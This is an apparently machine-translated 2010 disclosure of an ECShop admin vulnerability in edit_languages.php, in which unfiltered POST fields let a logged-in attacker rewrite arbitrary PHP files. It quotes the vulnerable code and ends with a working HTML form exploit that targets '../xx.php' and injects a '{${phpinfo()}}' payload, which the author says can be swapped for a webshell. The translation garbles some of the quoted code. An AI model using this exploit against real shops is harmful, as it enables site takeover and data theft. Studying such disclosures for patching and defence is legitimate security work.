ECShop admin backend write-shell 0day vulnerability warning - The Black Bar Safety Net

2010-12-28T00:00:00
ID MYHACK58:62201028705
Type myhack58
Reporter 佚名
Modified 2010-12-28T00:00:00

Description

Author: xhm1n9[ESST] EMail:xhm1n9@0x70.com Site: http://www.x-xox-x.net Date: 2010-12-27 10:22:15 From: http://x-xox-x.net/exploit/11

This is three-month-old material now. The affected file is admin/edit_languages.php.

The relevant request variables are not filtered: in the `act=edit` branch, `$_POST['file_path']`, `$_POST['item']` and `$_POST['item_content'][]` are read straight from the request and passed to set_language_items(), which uses the path to open and rewrite the file without checking that it is one of the language files under the admin's control.

elseif ($_REQUEST['act'] == 'edit') { / Language items of the path / $lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : ";

/ Before replacement of the language of the item / $src_items = ! empty($_POST['item']) ? stripslashes_deep($_POST['item']) : ";

/ Modify the following language items / $dst_items = array(); $_POST['item_id'] = stripslashes_deep($_POST['item_id']);

for ($i = 0; $i < count($_POST['item_id']); $i++) { / Language content if it is empty, do not modify / if (trim($_POST['item_content'][$i]) == ") { unset($src_items[$i]); } else { $_POST['item_content'][$i] = str_replace('\\n', '\n', $_POST['item_content'][$i]); $dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$ _POST['item_content'][$i]. '";'; } }

/ Call the function to edit language item / $result = set_language_items($lang_file, $src_items, $dst_items);

if ($result === false) { / Modify failure message / $link[] = array('text' => $_LANG['back_list'], 'href' => 'javascript:history. back(-1)'); sys_msg($_LANG['edit_languages_false'], 0, $link); }

........................................ function set_language_items($file_path, $src_items, $dst_items) { /* Check whether the file can be written. * / if (file_mode_info($file_path) < 2) { return false; }

/ Get file contents / $line_array = file($file_path); if (!$ line_array) { return false; } else { $file_content = implode(", $line_array); }

$snum = count($src_items); $dnum = count($dst_items); if ($snum != $dnum) { return false; } / The index to sort, to prevent the dislocation of the replacement / ksort($src_items); ksort($dst_items); for ($i = 0; $i < $snum; $i++) { $file_content = str_replace($src_items[$i], $dst_items[$i], $file_content);

}

/ Write the revised language items / $f = fopen($file_path, 'wb'); if (!$ f) { return false; } if (! fwrite($f, $file_content)) { return false; } else { return true; } } Copy the code Test method: [www.x-xox-x.net] This site provides program(method)may carry offensive,for security research and teaching purposes,at your own risk! <title>ecshop 2.6 background to get a shell by:xhm1n9</title> <form name="searchForm" action="http://127.1/ecshop2.6/admin/edit_languages.php" method="post"> File:<input type="text" name="file_path" size="3 6" value="../xx.php" /><br>to any php file Keywords: <input type="text" name="item" size="3 for 2" value="" /><br>the selected file in the content Injected statement:<input type="text" name="item_content[]" size="3 0" value="{${phpinfo()}}" /><br>to replace the horse <input type="hidden" name="item_id" size="3 0" value="0" /><br> <input type="submit" value=" Search " class="button" /> <input type="hidden" name="act" value="edit" /> </form>